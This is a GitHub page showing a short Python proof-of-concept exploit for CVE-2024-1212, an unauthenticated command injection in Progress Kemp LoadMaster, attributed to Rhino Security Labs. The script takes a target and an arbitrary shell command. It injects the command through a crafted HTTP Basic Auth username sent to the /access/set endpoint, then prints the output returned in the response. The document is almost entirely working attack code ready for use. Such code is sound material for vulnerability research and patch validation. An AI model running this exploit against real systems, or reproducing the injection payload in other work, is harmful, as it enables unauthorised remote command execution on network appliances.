-
Notifications
You must be signed in to change notification settings - Fork 238
/
Copy pathCVE-2024-1212.py
33 lines (26 loc) · 1.17 KB
/
CVE-2024-1212.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
# Exploit for CVE-2024-1212: Unauthenticated command injection in Progress Kemp LoadMaster
# Tested on: LoadMaster 7.2.59.0.22007
# Author: Dave Yesland @daveysec with Rhino Security Labs
import requests
from requests.auth import HTTPBasicAuth
import argparse
requests.packages.urllib3.disable_warnings()
argparser = argparse.ArgumentParser(description="Exploit for CVE-2024-1212: Unauthenticated RCE in Progress Kemp LoadMaster")
argparser.add_argument('target', help='The target (https://LoadmasterIP)')
argparser.add_argument('command', help='The command to run')
args = argparser.parse_args()
target = args.target
command = args.command
normal_headers = ["Date", "Connection", "Content-Type", "Transfer-Encoding"]
# Fix colons as it will break the basic auth
command = command.replace(":", "$'\\x3a'")
url = f"{target}/access/set?param=enableapi&value=1"
r = requests.get(url, auth=HTTPBasicAuth(f"';{command};echo '", "anything"), verify=False)
for key, value in r.headers.items():
if key not in normal_headers:
print(f"{key}: {value}")
for line in r.text.splitlines():
if line == ' -p anything':
break
else:
print(line)